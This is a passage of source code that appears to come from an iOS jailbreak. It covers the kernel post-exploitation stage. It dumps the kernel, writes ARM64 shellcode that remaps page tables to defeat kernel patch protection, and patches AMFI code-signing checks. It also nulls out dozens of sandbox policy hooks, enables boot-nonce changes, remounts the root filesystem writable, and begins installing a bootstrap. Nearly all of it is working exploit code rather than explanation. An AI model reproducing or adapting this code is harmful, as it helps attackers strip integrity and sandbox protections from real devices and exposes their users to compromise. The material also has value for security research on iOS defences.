| uint64_t orig_cred = cred; 146 | 147 | WriteAnywhere64(bsd_task+0x100, credpatch); 148 | 149 | checkvad(); 150 | 151 | vm_address_t vmd = 0; 152 | _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE); 153 | 154 | copyin((void*)vmd, kernbase, 0x4000); 155 | 156 | struct mach_header_64* vmk = vmd; 157 | uint64_t max = 0; 158 | uint64_t min = -1; 159 | 160 | struct load_command* lc = vmk+1; 161 | for (int k=0; k < vmk->ncmds; k++) { 162 | 163 | if (lc->cmd == LC_SEGMENT_64) { 164 | struct segment_command_64* sg = lc; 165 | NSLog(@"seg: %s", sg->segname); 166 | if (sg->vmaddr < min) { 167 | min = sg->vmaddr; 168 | } 169 | if (sg->vmaddr + sg->vmsize > max) { 170 | max = sg->vmaddr+sg->vmsize; 171 | } 172 | } 173 | 174 | lc = ((char*)lc) + lc->cmdsize; 175 | } 176 | 177 | NSLog(@"%llx - %llx", min, max); 178 | 179 | char* kdump = malloc(max-min); 180 | 181 | for (int k=0; k < (max-min)/0x4000; k++) { 182 | copyin(kdump+k*0x4000, min+k*0x4000, 0x4000); 183 | } 184 | 185 | NSLog(@"%llx", kdump); 186 | uint64_t kerndumpsize = 0; 187 | uint64_t gadget_base = 0; 188 | uint64_t gadget_size = 0; 189 | uint64_t prelink_base = 0; 190 | uint64_t prelink_size = 0; 191 | uint64_t kerndumpbase = -1; 192 | 193 | 194 | struct mach_header_64* mh_kern = (struct mach_header_64*) (kdump+kernbase-min); 195 | struct load_command* load_cmd = (struct load_command*)(mh_kern+1); 196 | 197 | uint64_t entryp = 0; 198 | 199 | for (int i = 0; i < mh_kern->ncmds; i++) { 200 | 201 | if (load_cmd->cmd == LC_SEGMENT_64) { 202 | struct segment_command_64* seg = (struct segment_command_64*)load_cmd; 203 | //NSLog(@"found segment %s", seg->segname); 204 | 205 | if (strcmp(seg->segname, "__TEXT_EXEC") == 0) { 206 | gadget_base = seg->vmaddr; 207 | gadget_size = seg->filesize; 208 | } 209 | if (strcmp(seg->segname, "__PLK_TEXT_EXEC") == 0) { 210 | prelink_base = seg->vmaddr; 211 | prelink_size = seg->filesize; 212 | } 213 | 214 | if (seg->vmaddr < kerndumpbase) { 215 | kerndumpbase = seg->vmaddr; 216 | } 217 | kerndumpsize += seg->vmsize; 218 | } else if (load_cmd->cmd == LC_UNIXTHREAD) { 219 | struct { 220 | unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ 221 | unsigned long cmdsize; /* total size of this command */ 222 | unsigned long flavor; /* flavor of thread state */ 223 | unsigned long count; /* count of longs in thread state */ 224 | struct { 225 | __uint64_t __x[29]; /* General purpose registers x0-x28 */ 226 | __uint64_t __fp; /* Frame pointer x29 */ 227 | __uint64_t __lr; /* Link register x30 */ 228 | __uint64_t __sp; /* Stack pointer x31 */ 229 | __uint64_t __pc; /* Program counter */ 230 | __uint32_t __cpsr; /* Current program status register */ 231 | __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ 232 | } state; 233 | } * thr = load_cmd; 234 | entryp = thr->state.__pc; 235 | } 236 | 237 | load_cmd = (struct load_command*)(load_cmd->cmdsize + (vm_address_t)(load_cmd)); 238 | } 239 | set_dump(kerndumpbase, kerndumpsize, (uint8_t*)kdump); 240 | set_text_exec(gadget_base, gadget_size); 241 | set_prelink_exec(prelink_base, prelink_size); 242 | 243 | uint64_t gStoreBase = find_gPhysBase(); 244 | 245 | gPhysBase = ReadAnywhere64(gStoreBase); 246 | gVirtBase = ReadAnywhere64(gStoreBase+8); 247 | 248 | entryp += slide; 249 | uint64_t rvbar = entryp & (~0xFFF); 250 | 251 | uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); 252 | 253 | uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); 254 | if (uref) { 255 | optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; 256 | } 257 | NSLog(@"%llx", optr); 258 | 259 | uint64_t cpu_list = ReadAnywhere64(cpul - 0x10 /*the add 0x10, 0x10 instruction confuses findregval*/) - gPhysBase + gVirtBase; 260 | uint64_t cpu = ReadAnywhere64(cpu_list); 261 | 262 | uint64_t pmap_store = find_kernel_pmap(); 263 | NSLog(@"pmap: %llx", pmap_store); 264 | level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); 265 | 266 | 267 | 268 | 269 | uint64_t shellcode = physalloc(0x4000); 270 | 271 | /* 272 | ldr x30, a 273 | ldr x0, b 274 | br x0 275 | nop 276 | a: 277 | .quad 0 278 | b: 279 | .quad 0 280 | none of that squad shit tho, straight gang shit. free rondonumbanine 281 | */ 282 | 283 | WriteAnywhere32(shellcode + 0x100, 0x5800009e); /* trampoline for idlesleep */ 284 | WriteAnywhere32(shellcode + 0x100 + 4, 0x580000a0); 285 | WriteAnywhere32(shellcode + 0x100 + 8, 0xd61f0000); 286 | 287 | WriteAnywhere32(shellcode + 0x200, 0x5800009e); /* trampoline for deepsleep */ 288 | WriteAnywhere32(shellcode + 0x200 + 4, 0x580000a0); 289 | WriteAnywhere32(shellcode + 0x200 + 8, 0xd61f0000); 290 | 291 | char buf[0x100]; 292 | copyin(buf, optr, 0x100); 293 | copyout(shellcode+0x300, buf, 0x100); 294 | 295 | uint64_t physcode = findphys_real(shellcode); 296 | 297 | 298 | 299 | NSLog(@"got phys at %llx for virt %llx", physcode, shellcode); 300 | 301 | uint64_t idlesleep_handler = 0; 302 | 303 | uint64_t plist[12]={0,0,0,0,0,0,0,0,0,0,0,0}; 304 | int z = 0; 305 | 306 | int idx = 0; 307 | int ridx = 0; 308 | while (cpu) { 309 | cpu = cpu - gPhysBase + gVirtBase; 310 | if ((ReadAnywhere64(cpu+0x130) & 0x3FFF) == 0x100) { 311 | NSLog(@"already jailbroken, bailing out"); 312 | return; 313 | } 314 | 315 | 316 | if (!idlesleep_handler) { 317 | WriteAnywhere64(shellcode + 0x100 + 0x18, ReadAnywhere64(cpu+0x130)); // idlehandler 318 | WriteAnywhere64(shellcode + 0x200 + 0x18, ReadAnywhere64(cpu+0x130) + 12); // deephandler 319 | 320 | idlesleep_handler = ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase; 321 | 322 | 323 | uint32_t* opcz = malloc(0x1000); 324 | copyin(opcz, idlesleep_handler, 0x1000); 325 | idx = 0; 326 | while (1) { 327 | if (opcz[idx] == 0xd61f0000 /* br x0 */) { 328 | break; 329 | } 330 | idx++; 331 | } 332 | ridx = idx; 333 | while (1) { 334 | if (opcz[ridx] == 0xd65f03c0 /* ret */) { 335 | break; 336 | } 337 | ridx++; 338 | } 339 | 340 | 341 | } 342 | 343 | NSLog(@"found cpu %x", ReadAnywhere32(cpu+0x330)); 344 | NSLog(@"found physz: %llx", ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase); 345 | 346 | plist[z++] = cpu+0x130; 347 | cpu_list += 0x10; 348 | cpu = ReadAnywhere64(cpu_list); 349 | } 350 | 351 | 352 | uint64_t shc = physalloc(0x4000); 353 | 354 | uint64_t regi = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+12-gadget_base, text_exec_base, 30); 355 | uint64_t regd = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+24-gadget_base, text_exec_base, 30); 356 | 357 | NSLog(@"%llx - %llx", regi, regd); 358 | 359 | for (int i = 0; i < 0x500/4; i++) { 360 | WriteAnywhere32(shc+i*4, 0xd503201f); 361 | } 362 | 363 | /* 364 | isvad 0 == 0x4000 365 | */ 366 | 367 | uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); 368 | 369 | uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1); 370 | 371 | NSLog(@"ttbr0: %llx %llx",ReadAnywhere64(ttbr0_real), ttbr0_real); 372 | 373 | char* bbuf = malloc(0x4000); 374 | copyin(bbuf, ReadAnywhere64(ttbr0_real) - gPhysBase + gVirtBase, isvad == 0 ? 0x4000 : 0x1000); 375 | copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); 376 | 377 | uint64_t physp = findphys_real(level0_pte); 378 | 379 | 380 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 381 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 382 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 383 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 384 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 385 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 386 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 387 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 388 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 389 | WriteAnywhere64(shc+40, regi); 390 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 391 | 392 | shc+=0x100; 393 | WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 394 | WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 395 | WriteAnywhere32(shc+8, 0xd508871f); // tlbi vmalle1 396 | WriteAnywhere32(shc+12, 0xd5033fdf); // isb 397 | WriteAnywhere32(shc+16, 0xd5033f9f); // dsb sy 398 | WriteAnywhere32(shc+20, 0xd5033b9f); // dsb ish 399 | WriteAnywhere32(shc+24, 0xd5033fdf); // isb 400 | WriteAnywhere32(shc+28, 0x5800007e); // ldr x30, 8 401 | WriteAnywhere32(shc+32, 0xd65f03c0); // ret 402 | WriteAnywhere64(shc+40, regd); /*handle deepsleep*/ 403 | WriteAnywhere64(shc+48, /* new ttbr1 */ physp); 404 | shc-=0x100; 405 | { 406 | int n = 0; 407 | WriteAnywhere32(shc+0x200+n, 0x18000148); n+=4; // ldr w8, 0x28 408 | WriteAnywhere32(shc+0x200+n, 0xb90002e8); n+=4; // str w8, [x23] 409 | WriteAnywhere32(shc+0x200+n, 0xaa1f03e0); n+=4; // mov x0, xzr 410 | WriteAnywhere32(shc+0x200+n, 0xd10103bf); n+=4; // sub sp, x29, #64 411 | WriteAnywhere32(shc+0x200+n, 0xa9447bfd); n+=4; // ldp x29, x30, [sp, #64] 412 | WriteAnywhere32(shc+0x200+n, 0xa9434ff4); n+=4; // ldp x20, x19, [sp, #48] 413 | WriteAnywhere32(shc+0x200+n, 0xa94257f6); n+=4; // ldp x22, x21, [sp, #32] 414 | WriteAnywhere32(shc+0x200+n, 0xa9415ff8); n+=4; // ldp x24, x23, [sp, #16] 415 | WriteAnywhere32(shc+0x200+n, 0xa8c567fa); n+=4; // ldp x26, x25, [sp], #80 416 | WriteAnywhere32(shc+0x200+n, 0xd65f03c0); n+=4; // ret 417 | WriteAnywhere32(shc+0x200+n, 0x0e00400f); n+=4; // tbl.8b v15, { v0, v1, v2 }, v0 418 | 419 | } 420 | 421 | mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 422 | 423 | vm_address_t kppsh = 0; 424 | mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); 425 | { 426 | int n = 0; 427 | 428 | WriteAnywhere32(kppsh+n, 0x580001e1); n+=4; // ldr x1, #60 429 | WriteAnywhere32(kppsh+n, 0x58000140); n+=4; // ldr x0, #40 430 | WriteAnywhere32(kppsh+n, 0xd5182020); n+=4; // msr TTBR1_EL1, x0 431 | WriteAnywhere32(kppsh+n, 0xd2a00600); n+=4; // movz x0, #0x30, lsl #16 432 | WriteAnywhere32(kppsh+n, 0xd5181040); n+=4; // msr CPACR_EL1, x0 433 | WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 434 | WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 435 | WriteAnywhere32(kppsh+n, isvad ? 0xd5033b9f : 0xd503201f); n+=4; // dsb ish (4k) / nop (16k) 436 | WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) 437 | WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb 438 | WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret 439 | WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; 440 | WriteAnywhere64(kppsh+n, physp); n+=8; 441 | WriteAnywhere64(kppsh+n, physp); n+=8; 442 | } 443 | 444 | mach_vm_protect(tfp0, kppsh, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 445 | 446 | WriteAnywhere64(shellcode + 0x100 + 0x10, shc - gVirtBase + gPhysBase); // idle 447 | WriteAnywhere64(shellcode + 0x200 + 0x10, shc + 0x100 - gVirtBase + gPhysBase); // idle 448 | 449 | WriteAnywhere64(shellcode + 0x100 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // idlehandler 450 | WriteAnywhere64(shellcode + 0x200 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // deephandler 451 | 452 | /* 453 | 454 | pagetables are now not real anymore, they're real af 455 | 456 | */ 457 | 458 | int cpacr_idx = 0; 459 | uint32_t* opps = gadget_base - min + kdump; 460 | 461 | while (1) { 462 | if (opps[cpacr_idx] == 0xd5181040) { 463 | NSLog(@"got a cpacr"); 464 | break; 465 | } 466 | cpacr_idx++; 467 | } 468 | #define PSZ (isvad ? 0x1000 : 0x4000) 469 | #define PMK (PSZ-1) 470 | 471 | 472 | #define RemapPage_(address) \ 473 | pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ 474 | uint64_t tte = ReadAnywhere64(tte_addr);\ 475 | if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ 476 | NSLog(@"breakup!");\ 477 | uint64_t fakep = physalloc(PSZ);\ 478 | uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\ 479 | TTE_SETB(tte, TTE_IS_TABLE_MASK);\ 480 | for (int i = 0; i < PSZ/8; i++) {\ 481 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\ 482 | WriteAnywhere64(fakep+i*8, tte);\ 483 | }\ 484 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\ 485 | WriteAnywhere64(tte_addr, tte);\ 486 | }\ 487 | uint64_t newt = physalloc(PSZ);\ 488 | copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\ 489 | copyout(newt, bbuf, PSZ);\ 490 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\ 491 | TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ 492 | TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ 493 | WriteAnywhere64(tte_addr, tte);\ 494 | }, level1_table, isvad ? 1 : 2); 495 | 496 | #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) 497 | 498 | uint64_t* remappage = calloc(512, 8); 499 | 500 | int remapcnt = 0; 501 | 502 | 503 | #define RemapPage(x)\ 504 | {\ 505 | int fail = 0;\ 506 | for (int i = 0; i < remapcnt; i++) {\ 507 | if (remappage[i] == (x & (~PMK))) {\ 508 | fail = 1;\ 509 | }\ 510 | }\ 511 | if (fail == 0) {\ 512 | RemapPage_(x);\ 513 | RemapPage_(x+PSZ);\ 514 | remappage[remapcnt++] = (x & (~PMK));\ 515 | }\ 516 | } 517 | 518 | level1_table = physp - gPhysBase + gVirtBase; 519 | WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); 520 | 521 | 522 | uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64); 523 | RemapPage(gadget_base + cpacr_idx*4); 524 | WriteAnywhere32(NewPointer(gadget_base + cpacr_idx*4), 0x94000000 | (((shtramp - (gadget_base+cpacr_idx*4))/4) & 0x3FFFFFF)); 525 | 526 | RemapPage(shtramp); 527 | WriteAnywhere32(NewPointer(shtramp), 0x58000041); 528 | WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); 529 | WriteAnywhere64(NewPointer(shtramp)+8, kppsh); 530 | 531 | uint64_t lwvm_write = find_lwvm_mapio_patch(); 532 | uint64_t lwvm_value = find_lwvm_mapio_newj(); 533 | RemapPage(lwvm_write); 534 | WriteAnywhere64(NewPointer(lwvm_write), lwvm_value); 535 | 536 | 537 | uint64_t kernvers = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "Darwin Kernel Version", strlen("Darwin Kernel Version")) - whole_dump; 538 | uint64_t release = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "RELEASE_ARM", strlen("RELEASE_ARM")) - whole_dump; 539 | 540 | RemapPage(kernvers+whole_base-4); 541 | WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1); 542 | 543 | RemapPage(release+whole_base); 544 | if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) { 545 | copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */ 546 | } 547 | 548 | 549 | /* 550 | tfp0 and patch this bug 551 | */ 552 | { 553 | uint64_t endf = prelink_base+prelink_size; 554 | uint64_t ends = whole_size - (endf - whole_base); 555 | uint32_t* opps_stream = whole_dump + endf - whole_base; 556 | uint64_t* ptr_stream = whole_dump + endf - whole_base; 557 | 558 | uint64_t lastk = 0; 559 | int streak = 0; 560 | 561 | for (int i = 0; i < ends/8; i++) { 562 | uint64_t offp = ptr_stream[i]; 563 | if (endf < offp && offp < endf+ends) { 564 | offp -= endf; 565 | offp /= 4; 566 | if (ptr_stream[i+1] == 0 && ptr_stream[i+2] == 0) { 567 | if (opps_stream[offp] == 0x321e03e0 && opps_stream[offp+1] == 0xd65f03c0) { 568 | if (lastk+streak*0x20 == i*8 - 0x20) { 569 | streak++; 570 | if (streak == 9) { 571 | break; 572 | } 573 | } else { 574 | streak=0; 575 | lastk = i*8; 576 | } 577 | } 578 | } 579 | } 580 | } 581 | 582 | 583 | if (streak == 9) { 584 | 585 | 586 | char* sbstr = whole_dump + lastk + endf - whole_base - 8; 587 | 588 | uint64_t extract_attr_recipe = *(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/); 589 | 590 | uint32_t* opcode_stream = extract_attr_recipe - whole_base + whole_dump; 591 | 592 | int l = 0; 593 | while (1) { 594 | if ((opcode_stream[l] & 0xFFFFFC00) == 0x7103FC00) { // find cmp wX, 0xFF 595 | int cbz = l; 596 | while (1) { 597 | if ((opcode_stream[cbz] & 0xFF000000) == 0xB4000000) { 598 | break; 599 | } 600 | cbz--; 601 | } 602 | 603 | uint64_t ret_target = (opcode_stream[cbz] & 0xFFFFE0) >> 5; 604 | ret_target += cbz; 605 | 606 | 607 | int bhi = l; 608 | while (1) { 609 | if ((opcode_stream[bhi] & 0xFF000000) == 0x54000000) { 610 | break; 611 | } 612 | bhi++; 613 | } 614 | 615 | ret_target -= bhi; 616 | 617 | uint32_t new_opcode = opcode_stream[bhi] & (~0xFFFFE0); 618 | new_opcode |= (ret_target << 5) & 0xFFFFE0; 619 | 620 | RemapPage(extract_attr_recipe + bhi*4); 621 | WriteAnywhere32(NewPointer(extract_attr_recipe+bhi*4), new_opcode); 622 | 623 | break; 624 | } 625 | l++; 626 | } 627 | 628 | uint64_t tfp = *(uint64_t*)(sbstr + 45 * 0x20 + 8 /*fptr*/); 629 | 630 | opcode_stream = tfp - whole_base + whole_dump; 631 | 632 | int cbz = 0; 633 | while (1) { 634 | if ((opcode_stream[cbz] & 0xFF000000) == 0x34000000) { 635 | break; 636 | } 637 | cbz++; 638 | } 639 | 640 | RemapPage(tfp + cbz*4); 641 | WriteAnywhere32(NewPointer(tfp+cbz*4), 0xd503201f); 642 | } 643 | 644 | } 645 | /* 646 | nonceenabler 647 | */ 648 | 649 | { 650 | uint64_t endf = prelink_base+prelink_size; 651 | uint64_t ends = whole_size - (endf - whole_base); 652 | char* sbstr = memmem(whole_dump + endf - whole_base, ends, "com.apple.System.boot-nonce", strlen("com.apple.System.boot-nonce")); 653 | 654 | if (sbstr) { 655 | 656 | for (int i = 0; i < whole_size/8; i++) { 657 | if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) { 658 | NSLog(@"%x", ReadAnywhere32(whole_base+i*8+8+4)); 659 | 660 | WriteAnywhere32(whole_base+i*8+8+4, 1); 661 | } 662 | } 663 | } 664 | } 665 | 666 | 667 | 668 | uint64_t memcmp_got = find_amfi_memcmpstub(); 669 | uint64_t ret1 = find_ret_0(); 670 | 671 | RemapPage(memcmp_got); 672 | WriteAnywhere64(NewPointer(memcmp_got), ret1); 673 | 674 | uint64_t fref = find_reference((uint32_t*)get_data_for_mode(0, SearchTextExec), text_exec_size, text_exec_base, idlesleep_handler+0xC) + text_exec_base; 675 | NSLog(@"fref at %llx", fref); 676 | 677 | uint64_t find_string_reference(char* string, enum Search mode); 678 | uint64_t amfiops = 0; 679 | //= find_string_reference("Apple Mobile File Integrity", SearchPrelinkExec); 680 | char* sbstr = memmem(whole_dump, whole_size, "Apple Mobile File Integrity", strlen("Apple Mobile File Integrity")); 681 | for (int i = 0; i < whole_size/8; i++) { 682 | if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) { 683 | amfiops = *(uint64_t*)(whole_dump+i*8+0x18); 684 | break; 685 | } 686 | } 687 | 688 | NSLog(@"amfistr at %llx", amfiops); 689 | 690 | 691 | { 692 | /* 693 | amfi 694 | */ 695 | 696 | uint64_t sbops = amfiops; 697 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); 698 | 699 | uint64_t nopag = sbops_end - sbops; 700 | 701 | for (int i = 0; i < nopag; i+= PSZ) { 702 | RemapPage(((sbops + i) & (~PMK))); 703 | } 704 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 705 | } 706 | 707 | 708 | /* 709 | first str 710 | */ 711 | while (1) { 712 | uint32_t opcode = ReadAnywhere32(fref); 713 | if ((opcode & 0xFFC00000) == 0xF9000000) { 714 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 715 | int32_t myreg = (opcode >> 5) & 0x1f; 716 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 717 | 718 | WriteAnywhere64(rgz, physcode+0x200); 719 | break; 720 | } 721 | fref += 4; 722 | } 723 | 724 | fref += 4; 725 | 726 | /* 727 | second str 728 | */ 729 | while (1) { 730 | uint32_t opcode = ReadAnywhere32(fref); 731 | if ((opcode & 0xFFC00000) == 0xF9000000) { 732 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 733 | int32_t myreg = (opcode >> 5) & 0x1f; 734 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 735 | 736 | WriteAnywhere64(rgz, physcode+0x100); 737 | break; 738 | } 739 | fref += 4; 740 | } 741 | 742 | { 743 | /* 744 | sandbox 745 | */ 746 | 747 | uint64_t sbops = find_sbops(); 748 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; 749 | 750 | uint64_t nopag = (sbops_end - sbops)/(PSZ); 751 | 752 | for (int i = 0; i < nopag; i++) { 753 | RemapPage(((sbops + i*(PSZ)) & (~PMK))); 754 | } 755 | 756 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 757 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 758 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 759 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access)), 0); 760 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot)), 0); 761 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create)), 0); 762 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr)), 0); 763 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata)), 0); 764 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec)), 0); 765 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist)), 0); 766 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr)), 0); 767 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl)), 0); 768 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link)), 0); 769 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr)), 0); 770 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open)), 0); 771 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink)), 0); 772 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist)), 0); 773 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr)), 0); 774 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags)), 0); 775 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode)), 0); 776 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner)), 0); 777 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 778 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 779 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat)), 0); 780 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate)), 0); 781 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink)), 0); 782 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create)), 0); 783 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath)), 0); 784 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr)), 0); 785 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat)), 0); 786 | 787 | } 788 | 789 | { 790 | uint64_t point = find_amfiret()-0x18; 791 | 792 | RemapPage((point & (~PMK))); 793 | uint64_t remap = NewPointer(point); 794 | 795 | assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); 796 | 797 | WriteAnywhere32(remap, 0x58000041); 798 | WriteAnywhere32(remap + 4, 0xd61f0020); 799 | WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */ 800 | 801 | } 802 | 803 | for (int i = 0; i < z; i++) { 804 | WriteAnywhere64(plist[i], physcode + 0x100); 805 | } 806 | 807 | while (ReadAnywhere32(kernvers+whole_base-4) != 1) { 808 | sleep(1); 809 | } 810 | 811 | NSLog(@"enabled patches"); 812 | 813 | { 814 | // mount patch 815 | extern uint64_t rootvnode_offset; 816 | uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); 817 | 818 | struct utsname uts; 819 | uname(&uts); 820 | 821 | vm_offset_t off = 0xd8; 822 | if (strstr(uts.version, "16.0.0")) { 823 | off = 0xd0; 824 | } 825 | 826 | uint64_t v_mount = ReadAnywhere64(rootfs_vnode+off); 827 | 828 | uint32_t v_flag = ReadAnywhere32(v_mount + 0x71); 829 | 830 | WriteAnywhere32(v_mount + 0x71, v_flag & (~(0x1<<6))); 831 | 832 | char* nmz = strdup("/dev/disk0s1s1"); 833 | int lolr = mount( "hfs", "/", MNT_UPDATE, (void*)&nmz); 834 | NSLog(@"remounting: %d", lolr); 835 | 836 | v_mount = ReadAnywhere64(rootfs_vnode+off); 837 | 838 | WriteAnywhere32(v_mount + 0x71, v_flag); 839 | } 840 | 841 | { 842 | char path[256]; 843 | uint32_t size = sizeof(path); 844 | _NSGetExecutablePath(path, &size); 845 | char* pt = realpath(path, 0); 846 | 847 | { 848 | __block pid_t pd = 0; 849 | NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; 850 | 851 | 852 | int f = open("/.installed_yaluX", O_RDONLY); 853 | 854 | if (f == -1) { 855 | NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; 856 | NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; 857 | const char* jl = [tar UTF8String]; 858 | 859 | unlink("/bin/tar"); 860 | unlink("/bin/launchctl"); 861 | 862 | copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); 863 | chmod("/bin/tar", 0777); 864 | jl="/bin/tar"; // 865 | 866 | chdir("/"); 867 | 868 | posix_spawn(&pd, 